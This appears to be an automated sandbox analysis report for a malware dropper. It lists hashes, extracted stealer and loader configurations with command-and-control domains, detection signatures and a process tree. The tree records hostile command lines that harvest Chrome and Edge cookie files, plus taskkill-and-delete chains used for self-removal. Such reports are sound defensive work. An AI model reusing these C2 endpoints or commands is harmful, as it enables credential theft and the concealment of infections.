Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1801s
  • max time network
    1820s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    27-07-2021 08:13

General

  • Target

    8 (12).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

vidar

Version

39.7

Botnet

921

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    921

Extracted

Family

redline

Botnet

sel21

C2

salkefard.xyz:80

Extracted

Family

redline

Botnet

AniNEW

C2

akedauiver.xyz:80

Extracted

Family

vidar

Version

39.7

Botnet

865

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    865

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 7 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 15 IoCs
  • Checks SCSI registry key(s) 3 TTPs 21 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 28 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2856
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2748
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2736
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2564
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2488
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
            • Modifies registry class
            PID:1852
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1412
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1364
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1184
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1052
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:912
                    • C:\Users\Admin\AppData\Roaming\itwwuwd
                      C:\Users\Admin\AppData\Roaming\itwwuwd
                      2⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5320
                    • C:\Users\Admin\AppData\Roaming\itwwuwd
                      C:\Users\Admin\AppData\Roaming\itwwuwd
                      2⤵
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:4712
                    • C:\Users\Admin\AppData\Roaming\cfwwuwd
                      C:\Users\Admin\AppData\Roaming\cfwwuwd
                      2⤵
                      • Suspicious use of SetThreadContext
                      PID:5484
                      • C:\Users\Admin\AppData\Roaming\cfwwuwd
                        C:\Users\Admin\AppData\Roaming\cfwwuwd
                        3⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:496
                    • C:\Users\Admin\AppData\Roaming\itwwuwd
                      C:\Users\Admin\AppData\Roaming\itwwuwd
                      2⤵
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:6048
                    • C:\Users\Admin\AppData\Roaming\cfwwuwd
                      C:\Users\Admin\AppData\Roaming\cfwwuwd
                      2⤵
                      • Suspicious use of SetThreadContext
                      PID:5696
                      • C:\Users\Admin\AppData\Roaming\cfwwuwd
                        C:\Users\Admin\AppData\Roaming\cfwwuwd
                        3⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5200
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:1020
                    • C:\Users\Admin\AppData\Local\Temp\8 (12).exe
                      "C:\Users\Admin\AppData\Local\Temp\8 (12).exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4648
                      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:344
                        • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\setup_install.exe
                          "C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\setup_install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:3964
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c sonia_1.exe
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4172
                            • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\sonia_1.exe
                              sonia_1.exe
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:4176
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c sonia_2.exe
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4184
                            • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\sonia_2.exe
                              sonia_2.exe
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: MapViewOfSection
                              PID:1764
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c sonia_3.exe
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2212
                            • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\sonia_3.exe
                              sonia_3.exe
                              5⤵
                              • Executes dropped EXE
                              • Modifies system certificate store
                              PID:576
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 576 -s 932
                                6⤵
                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4204
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c sonia_4.exe
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4124
                            • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\sonia_4.exe
                              sonia_4.exe
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1620
                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:204
                                • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                  "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  PID:3476
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    8⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:964
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    8⤵
                                    • Executes dropped EXE
                                    PID:4000
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    8⤵
                                      PID:1300
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                        PID:4680
                                    • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                      "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:2812
                                      • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                        C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                        8⤵
                                        • Executes dropped EXE
                                        PID:4848
                                    • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                                      "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                                      7⤵
                                        PID:4192
                                        • C:\Windows\winnetdriv.exe
                                          "C:\Users\Admin\AppData\Local\Temp\setup 326.exe" 1627381162 0
                                          8⤵
                                          • Executes dropped EXE
                                          PID:4200
                                      • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:4568
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 804
                                          8⤵
                                          • Program crash
                                          PID:3832
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 880
                                          8⤵
                                          • Executes dropped EXE
                                          • Drops file in Windows directory
                                          • Program crash
                                          PID:4192
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 952
                                          8⤵
                                          • Program crash
                                          PID:1124
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1004
                                          8⤵
                                          • Program crash
                                          PID:4368
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1132
                                          8⤵
                                          • Program crash
                                          PID:5144
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 828
                                          8⤵
                                          • Program crash
                                          PID:5344
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1116
                                          8⤵
                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                          • Program crash
                                          PID:5440
                                      • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                        "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                                        7⤵
                                          PID:4440
                                          • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                            "C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a
                                            8⤵
                                            • Executes dropped EXE
                                            PID:5520
                                        • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                          "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:4864
                                          • C:\Windows\system32\WerFault.exe
                                            C:\Windows\system32\WerFault.exe -u -p 4864 -s 1004
                                            8⤵
                                            • Program crash
                                            PID:5732
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_6.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:648
                                    • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\sonia_6.exe
                                      sonia_6.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      • Suspicious use of WriteProcessMemory
                                      PID:392
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        6⤵
                                        • Executes dropped EXE
                                        PID:3120
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        6⤵
                                        • Executes dropped EXE
                                        PID:3032
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        6⤵
                                          PID:5196
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          6⤵
                                            PID:2312
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_7.exe
                                        4⤵
                                          PID:856
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3964 -s 544
                                          4⤵
                                          • Program crash
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1692
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c sonia_5.exe
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:504
                                  • \??\c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                    1⤵
                                    • Suspicious use of SetThreadContext
                                    • Modifies data under HKEY_USERS
                                    • Modifies registry class
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of WriteProcessMemory
                                    PID:4828
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                      2⤵
                                      • Checks processor information in registry
                                      • Modifies data under HKEY_USERS
                                      • Modifies registry class
                                      PID:3196
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                      2⤵
                                      • Drops file in System32 directory
                                      • Checks processor information in registry
                                      • Modifies data under HKEY_USERS
                                      • Modifies registry class
                                      PID:4196
                                  • C:\Users\Admin\AppData\Local\Temp\7zS8516BB94\sonia_5.exe
                                    sonia_5.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    PID:1500
                                    • C:\Users\Admin\Documents\5hhKoKLrk_eMVc8yCoHAMprn.exe
                                      "C:\Users\Admin\Documents\5hhKoKLrk_eMVc8yCoHAMprn.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:3632
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        3⤵
                                        • Executes dropped EXE
                                        PID:2672
                                    • C:\Users\Admin\Documents\4LSMTXIBlVl56M7NS_xM0NOo.exe
                                      "C:\Users\Admin\Documents\4LSMTXIBlVl56M7NS_xM0NOo.exe"
                                      2⤵
                                        PID:964
                                        • C:\Users\Admin\Documents\4LSMTXIBlVl56M7NS_xM0NOo.exe
                                          C:\Users\Admin\Documents\4LSMTXIBlVl56M7NS_xM0NOo.exe
                                          3⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Checks processor information in registry
                                          PID:5004
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c taskkill /im 4LSMTXIBlVl56M7NS_xM0NOo.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\4LSMTXIBlVl56M7NS_xM0NOo.exe" & del C:\ProgramData\*.dll & exit
                                            4⤵
                                              PID:5180
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                5⤵
                                                • Executes dropped EXE
                                                PID:4440
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /im 4LSMTXIBlVl56M7NS_xM0NOo.exe /f
                                                5⤵
                                                • Kills process with taskkill
                                                PID:936
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /t 6
                                                5⤵
                                                • Delays execution with timeout.exe
                                                PID:5656
                                        • C:\Users\Admin\Documents\_bacrb9MGzK78M_6RXa1DRRg.exe
                                          "C:\Users\Admin\Documents\_bacrb9MGzK78M_6RXa1DRRg.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Drops startup file
                                          PID:2604
                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            3⤵
                                            • Executes dropped EXE
                                            PID:5652
                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            3⤵
                                            • Executes dropped EXE
                                            PID:5960
                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            3⤵
                                            • Executes dropped EXE
                                            PID:5688
                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            3⤵
                                            • Executes dropped EXE
                                            PID:5748
                                        • C:\Users\Admin\Documents\Y3jqMGdVCq1TDrMXSNPW6_di.exe
                                          "C:\Users\Admin\Documents\Y3jqMGdVCq1TDrMXSNPW6_di.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          PID:3136
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 664
                                            3⤵
                                            • Program crash
                                            PID:2096
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 668
                                            3⤵
                                            • Program crash
                                            PID:3084
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 676
                                            3⤵
                                            • Program crash
                                            PID:4844
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 700
                                            3⤵
                                            • Program crash
                                            PID:2192
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 1004
                                            3⤵
                                            • Program crash
                                            PID:4816
                                        • C:\Users\Admin\Documents\s7RAndCD40wSSLEOAf4ixDzD.exe
                                          "C:\Users\Admin\Documents\s7RAndCD40wSSLEOAf4ixDzD.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:2892
                                          • C:\Users\Admin\Documents\s7RAndCD40wSSLEOAf4ixDzD.exe
                                            "C:\Users\Admin\Documents\s7RAndCD40wSSLEOAf4ixDzD.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Checks SCSI registry key(s)
                                            • Suspicious behavior: MapViewOfSection
                                            PID:3856
                                        • C:\Users\Admin\Documents\FNFL1f8hWCuBbuZMsivVPYfT.exe
                                          "C:\Users\Admin\Documents\FNFL1f8hWCuBbuZMsivVPYfT.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2644
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /c taskkill /f /im chrome.exe
                                            3⤵
                                              PID:5768
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /f /im chrome.exe
                                                4⤵
                                                • Kills process with taskkill
                                                PID:5988
                                          • C:\Users\Admin\Documents\hJYbvnVuLwbiHF1I_DLSajyn.exe
                                            "C:\Users\Admin\Documents\hJYbvnVuLwbiHF1I_DLSajyn.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:4600
                                            • C:\Users\Admin\Documents\hJYbvnVuLwbiHF1I_DLSajyn.exe
                                              C:\Users\Admin\Documents\hJYbvnVuLwbiHF1I_DLSajyn.exe
                                              3⤵
                                              • Executes dropped EXE
                                              PID:908
                                          • C:\Users\Admin\Documents\giPx_8Vtjjk4BNRGmztSXLWx.exe
                                            "C:\Users\Admin\Documents\giPx_8Vtjjk4BNRGmztSXLWx.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Checks BIOS information in registry
                                            • Checks whether UAC is enabled
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Suspicious use of WriteProcessMemory
                                            PID:1620
                                          • C:\Users\Admin\Documents\aJtn2fz_M6Q4YUqGkqy1UQP6.exe
                                            "C:\Users\Admin\Documents\aJtn2fz_M6Q4YUqGkqy1UQP6.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Checks processor information in registry
                                            PID:2100
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c taskkill /im aJtn2fz_M6Q4YUqGkqy1UQP6.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\aJtn2fz_M6Q4YUqGkqy1UQP6.exe" & del C:\ProgramData\*.dll & exit
                                              3⤵
                                                PID:5804
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /im aJtn2fz_M6Q4YUqGkqy1UQP6.exe /f
                                                  4⤵
                                                  • Kills process with taskkill
                                                  PID:5376
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 6
                                                  4⤵
                                                  • Delays execution with timeout.exe
                                                  PID:3620
                                            • C:\Users\Admin\Documents\HJk6MmJYxHaa5ShUbfYm9Q5P.exe
                                              "C:\Users\Admin\Documents\HJk6MmJYxHaa5ShUbfYm9Q5P.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:4936
                                              • C:\Users\Admin\Documents\HJk6MmJYxHaa5ShUbfYm9Q5P.exe
                                                C:\Users\Admin\Documents\HJk6MmJYxHaa5ShUbfYm9Q5P.exe
                                                3⤵
                                                • Executes dropped EXE
                                                PID:4624
                                            • C:\Users\Admin\Documents\Cbn_6gJbgQZEy9yEcyIHyC42.exe
                                              "C:\Users\Admin\Documents\Cbn_6gJbgQZEy9yEcyIHyC42.exe"
                                              2⤵
                                                PID:4484
                                              • C:\Users\Admin\Documents\nHpCurDz1gXLD_psqILaSjXa.exe
                                                "C:\Users\Admin\Documents\nHpCurDz1gXLD_psqILaSjXa.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:4728
                                                • C:\Users\Admin\AppData\Roaming\updata.exe
                                                  C:\Users\Admin\AppData\Roaming\updata.exe updata
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:5924
                                                  • C:\Users\Admin\AppData\Roaming\updata.exe
                                                    "C:\Users\Admin\AppData\Roaming\updata.exe"
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:5388
                                              • C:\Users\Admin\Documents\dfh5KqG4jALB757QKG4m_YUn.exe
                                                "C:\Users\Admin\Documents\dfh5KqG4jALB757QKG4m_YUn.exe"
                                                2⤵
                                                  PID:3176
                                                  • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                    "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    PID:4008
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:5884
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
